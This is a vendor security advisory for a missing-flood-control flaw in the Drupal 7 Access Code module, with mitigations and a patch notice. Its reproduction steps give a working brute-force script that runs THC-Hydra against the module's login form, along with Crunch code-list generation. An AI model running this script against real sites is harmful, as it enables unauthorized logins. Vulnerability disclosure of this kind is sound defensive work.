By clicking "Accept", you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Privacy Policy for more information.

PreferencesRejectAccept
Manage Consent Preferences by Category
Essentials
Always active

Necessary for the site to function. Always On.

Used for targeted advertising.

Remembers your preferences and provides enhanced features.

Measures usage and improves your experience.

Reject AllAccept All
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
View all Vulnerabilities

SA-CONTRIB-2025-028

Broken Access
Affects
Access Code Drupal module
in
Drupal 7
No items found.
Versions
<=7.1.1
Exclamation circle icon
Patch Available

This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs.

View NES Solution

Overview

Drupal is an open-source content management system known for its flexibility, robust features, and strong community support. Organizations of all sizes use it to build and manage dynamic websites and web applications. The Access Control contributed module allows users to log in using an access code instead of entering a username and password.

The module contains a vulnerability in that it does not include flood control. With flood control missing (and no other protective measures in place), it is possible to determine an access code with a brute-force attack.

Broken Access Control occurs when an application fails to properly enforce restrictions on what authenticated users are allowed to do, enabling attackers to access unauthorized functionality, data, or resources. It often stems from inadequate validation of user permissions, allowing someone to bypass intended security boundaries and perform actions beyond their assigned role.

In this case, a brute force attack can allow a malicious user to enter the system.

Any of the following ramifications are possible:

  • Allowing arbitrary code execution
  • Complete system compromise
  • Data theft or exposure
  • Data manipulation or destruction
  • Privilege escalation, and
  • Denial of service.

Typically, exploits such as this are considered high-severity, However, this is rated as medium-severity because of the following mitigating factors:

  • The module is not installed by default
  • Login through the module can be turned off for sensitive accounts.

This issue affects all versions of Drupal 7 Access Control including and below 7.1.1; it is patched  in Access Control NES version 7.1.2.

Details

Module Info

Product: Drupal

Affected modules: Access Control contributed module

Affected versions: <=7.1.1

Project page: https://www.drupal.org/project/access_code

Vulnerability Info

This medium-severity vulnerability is found in all versions of the Access Code module up to and including 7.1.1.

Steps to Reproduce

1. On the latest stable version of Drupal 7, install and enable a susceptible version of Access Code (such as 7.1.1).

2. Download and install THC-Hydra with one of the following:

On Linux:

sudo apt update && sudo apt install hydra

On macOS (via Homebrew):

brew install hydra

3. Create a user at Admin > People > Add user (“testuser”). Assign the user with a short access code, such as GVK6.

4. Prepare a code list using Crunch.

          a. Install Crunch:

brew install crunch

          b. Since the code is four characters, generate a list of all 4-character variations (about 0.25MB):

crunch 4 4 ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -t G@@@ -o codes.txt

5. Copy the script below into ./brute_access_code.sh, set your domain and set the execute script:

#!/bin/bash

THREADS=32
DOMAIN="<your-domain>"
PORT=8090
SITE="http://$DOMAIN:$PORT"
ENDPOINT="/user/ac"
FORM_HTML=$(curl -s "${SITE}${ENDPOINT}")
FORM_BUILD_ID=$(echo "${FORM_HTML}" | grep -o 'name="form_build_id" value="[^"]*"' | cut -d '"' -f 4)
OPT="/user/ac:dummy=^USER^&access_code=^PASS^&form_build_id=${FORM_BUILD_ID}&form_id=access_code_login&op=Log%20in:Invalid access code|Too many failed login attempts. Please try again later."
hydra -l dummy -P codes.txt -t $THREADS -s $PORT $DOMAIN http-post-form "$OPT"

6. Run the attack:

% ./brute_access_code.sh

7. Observe that THC-Hydra successfully finds the access code, which means that there is no impediment to a brute force attack.

8. Use the Access Code NES module instead, re-run the attack, and observe that the brute force attack is thwarted.

Addressing the Issue

Users of the affected component(s) should address this exploit in one of the following ways:

  • Using a Web Application Firewall (WAF), configure rate limiting rules to restrict the number of access code attempts per IP address per time period; consider rate limiting modules for webservers, as well
  • Disable access code logins for critical accounts
  • Implement a CAPTCHA challenge on the form after a certain number of failed attempts
  • Manually implement session-based attempt tracking in custom code
  • Sign up for post-EOL security support; HeroDevs customers get immediate access to a patched version of this module.

Credits

Pink arrow
Pink arrow
CVE-2025-31687
CVE-2025-31689
SA-CORE-2025-002
SA-CONTRIB-2025-072
SA-CONTRIB-2025-028
CVE-2025-3901
CVE-2025-12848
What is a HeroDevs Security Advisory?
Vulnerability Details
ID
SA-CONTRIB-2025-028
PROJECT Affected
Access Code Drupal module
Versions Affected
<=7.1.1
Published date
August 26, 2025
≈ Fix date
August 26, 2025
Fixed in
NES for Drupal 7
Severity
Level
CVSS Assessment
Low
>=0 <4
Medium
>=4 <6
High
>=6 <8
Critical
>=8 <10
Medium
Category
Broken Access
Sign up for the latest vulnerability alerts fixed in
NES for Drupal 7
Rss feed icon
Subscribe via RSS
or

By clicking “submit” I acknowledge receipt of our Privacy Policy.

Thanks for signing up for our Newsletter! We look forward to connecting with you.
Oops! Something went wrong while submitting the form.